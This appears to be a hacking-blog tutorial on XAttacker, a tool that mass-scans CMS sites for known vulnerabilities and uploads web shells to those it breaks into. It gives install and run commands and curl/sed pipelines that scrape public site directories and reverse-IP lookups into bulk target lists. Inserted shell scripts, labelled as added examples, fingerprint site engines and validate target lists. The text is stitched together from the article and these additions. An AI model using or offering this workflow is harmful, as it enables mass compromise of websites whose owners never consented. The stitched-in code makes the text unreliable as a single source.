From an attacker's point of view, site engines are no different from any other software or service. Their source code is usually public, and any researcher can analyze it for bugs, security holes included. This is why sites running a CMS are rarely the target of a tailored attack: far more often they are hacked in bulk, one known vulnerability tried against a long list of hosts.
Hacking websites is one of the most common types of attack. If you want to know how sites get hacked and what to look at to protect your own resource, this article is for you. By how they are built, sites fall into three broad classes:
- self-written (hand-coded HTML, produced by a static generator such as Jekyll, or built in a desktop tool such as Adobe Dreamweaver);
- made in online site builders (mostly business-card sites with no database and no submitted form fields);
- running on a ready-made CMS (Content Management System).
Custom CMSs written for a single site still exist, but they have become rare: only the largest resources can afford to maintain their own engine, and justifying that cost is not easy.
Hacking
This is a short manual on using XAttacker. Since the program is built to check a large number of sites, I will also show how to compile lists of sites. XAttacker can find sites by dork (via Bing) or work through your own list; it then detects the CMS of each site automatically and checks it for a set of popular vulnerabilities. Supported content management systems: WordPress, Joomla, Drupal, PrestaShop and Lokomedia. If a vulnerability is found and exploited, a web shell is uploaded to the site.
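To make the detection step concrete, here is a minimal CMS fingerprinter as an added shell example (my own code, not the article's and not XAttacker's own logic): it reads one HTML page and looks for the markers each engine leaves in its output, such as WordPress's /wp-content/ asset path, the Joomla and Drupal generator meta tags, and PrestaShop's `var prestashop` front-end object. The marker list and the first-match-wins order are assumptions made for this example, Lokomedia is not covered, and the sample pages are constructed rather than captured from real sites.

```shell
#!/bin/sh
# Added example, not from the article or from XAttacker: a minimal version of
# the CMS fingerprinting a mass scanner runs on each site before deciding
# which checks to fire. Reads one HTML page on stdin, prints a CMS name.
# Marker list and match order are assumptions for this example.

detect_cms() {
    page=$(cat)
    case "$page" in
        *'name="generator" content="WordPress'*|*/wp-content/*|*/wp-includes/*)
            echo WordPress ;;
        *'name="generator" content="Joomla'*|*/media/jui/*|*/media/system/js/*)
            echo Joomla ;;
        *'content="Drupal'*|*Drupal.settings*|*/sites/default/files/*)
            echo Drupal ;;
        *'content="PrestaShop'*|*'var prestashop'*)
            echo PrestaShop ;;
        *)
            echo unknown ;;
    esac
}

# fingerprint_url: fetch a live site with a short timeout and classify it.
# This one touches the network; the stand-alone run below does not use it.
fingerprint_url() {
    curl -s -L --max-time 10 -A 'Mozilla/5.0' "$1" | detect_cms
}

# Constructed sample pages (not captured from real sites).
WP_PAGE='<html><head><link rel="stylesheet" href="/wp-content/themes/twentytwenty/style.css"></head></html>'
JOOMLA_PAGE='<html><head><meta name="generator" content="Joomla! - Open Source Content Management" /></head></html>'
DRUPAL_PAGE='<html><head><meta name="Generator" content="Drupal 7 (http://drupal.org)" /></head></html>'
PRESTA_PAGE='<html><head><script>var prestashop = {"cart":{}};</script></head></html>'
PLAIN_PAGE='<html><body><p>Hand-written page, no CMS</p></body></html>'

# Stand-alone run: classify each constructed page.
for p in "$WP_PAGE" "$JOOMLA_PAGE" "$DRUPAL_PAGE" "$PRESTA_PAGE" "$PLAIN_PAGE"; do
    printf '%s\n' "$p" | detect_cms
done
```

Running the script prints WordPress, Joomla, Drupal, PrestaShop and unknown, one per line. A real scanner adds version extraction on top of this (the generator tag often carries it), because the exploit list is keyed on version, not just on engine.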
Since the checks are fully automated and the list of known vulnerabilities is fixed, the obvious uses of the program are:
- checking a single target site when time is short;
- checking a large number of sites for vulnerabilities.
Mass checking and exploitation of vulnerabilities on WordPress, Joomla, Drupal, PrestaShop and Lokomedia sites
To install the program:
git clone https://github.com/Moham3dRiahi/XAttacker
cd XAttacker/
It can be run without options:
perl XAttacker.pl
The program then asks whether you already have a list of sites:
[+] You Have List Of Sites
[1] Yes
[2] No
[-] Choose :
To pass a list of sites directly, use the -l option:
perl XAttacker.pl -l list.txt
Each site in the list must be given with its protocol (http:// or https://), one per line.
The program checks them in turn, reports any vulnerability it finds, and uploads the shell when exploitation succeeds.
All vulnerable sites, together with the vulnerability found, are also written to the file Result/vulntargets.txt.
How to make lists of websites
The easiest way to get a list is to scrape pages that already list many sites: directories, search results, aggregators and so on.
For example, scraping sites from a popular directory:
curl -s https://top.mail.ru/Rating/Computers-Programming/Today/Visitors/{1..60}.html | grep -E '><a class="t90.*</a>' | sed 's/<br \/><a class="t90 t_grey" href="//' | grep -E -o '>.*<' | sed 's/>//' | sed 's/<//' > prog.txt
Note the construction {1..60}: this is Bash brace expansion, which produces the sequence 1 to 60, so sites are collected from the first sixty pages of the directory.
Another example, this time skipping entries that point to .html pages and prefixing every site with its protocol so the file can be fed to XAttacker as-is (a per-line sed is used for the prefix; wrapping the whole pipeline in a single echo, as is sometimes done, would prefix only the first line):
curl -s https://top.mail.ru/Rating/Job/Today/Visitors/{1..60}.html | grep -E '><a class="t90.*</a>' | grep -E -v '\.html' | sed 's/<br \/><a class="t90 t_grey" href="//' | grep -E -o '>.*<' | sed 's/>//' | sed 's/<//' | sed 's/^/http:\/\//' > biz.txt
Even larger lists, for example all sites sharing one hosting IP, can be obtained from a reverse-IP lookup service. Such services usually list the sites without a protocol, so run the following on the resulting list:
sed -i -e 's/^/http:\/\//' list.txt
This prepends http:// to every line in the list.
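As an added example (my own code, not from the article or from XAttacker), here is the list-building step done as a small shell script that runs offline: it pulls the link targets out of a directory page, drops paging links, prepends http:// only to entries that lack a scheme (an unconditional prefix would mangle https:// entries), deduplicates, and finally checks that every line is in the form XAttacker's -l option expects. The sample HTML is constructed for the example and copies the class="t90" anchors the article's pipeline keys on; the real top.mail.ru markup, and therefore the extraction regex, is an assumption you will have to adapt.

```shell
#!/bin/sh
# Added example, not from the article or from XAttacker: build and sanity-check
# a site list for mass scanning. Runs offline on the constructed HTML below.

# extract_sites: read HTML on stdin, print the href of every anchor with
# class "t90" (the class the article's own pipeline keys on), skipping
# paging links that end in .html. The markup is an assumption for this example.
extract_sites() {
    grep -E -o '<a class="t90[^"]*" href="[^"]*"' \
        | sed -E 's/.*href="([^"]*)".*/\1/' \
        | grep -E -v '\.html$'
}

# add_scheme: prepend http:// to lines that have no scheme yet. Unlike an
# unconditional sed 's/^/http:\/\//', this leaves https:// entries intact.
add_scheme() {
    sed -E '/^https?:\/\//!s#^#http://#'
}

# build_list: extract, normalise and deduplicate; LC_ALL=C keeps the sort
# byte-wise and independent of the caller's locale.
build_list() {
    extract_sites | add_scheme | LC_ALL=C sort -u
}

# check_list: succeed only if every line of the given file (or stdin) starts
# with http:// or https://, i.e. is in the form XAttacker's -l option expects.
check_list() {
    ! grep -E -v -q '^https?://' "$@"
}

# Constructed sample directory page (not real top.mail.ru content).
SAMPLE_HTML='<div>
<br /><a class="t90 t_grey" href="example.com">Example</a>
<br /><a class="t90 t_grey" href="https://secure.example.org">Secure</a>
<br /><a class="t90 t_grey" href="Rating/Computers-Programming/Today/Visitors/2.html">next page</a>
<br /><a class="t90 t_grey" href="example.com">Example again</a>
<br /><a class="t91" href="other.example.net">different class, ignored</a>
</div>'

# Stand-alone run: print the normalised list, then verify its format.
printf '%s\n' "$SAMPLE_HTML" | build_list
printf '%s\n' "$SAMPLE_HTML" | build_list | check_list && echo "list format OK"
```

For a real run replace the printf with the curl pipeline from the article and redirect build_list into list.txt; run check_list list.txt before handing the file to XAttacker, since a line without a scheme is silently useless to it.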
Conclusion
XAttacker is very easy to use, but no new vulnerabilities have been added to it for quite some time, so to get a hit you need to check a really large number of sites.
Alternatively, to improve the results substantially, search with dorks chosen specifically for the vulnerabilities the program supports; that takes some extra thought.
Source: kali.org.ru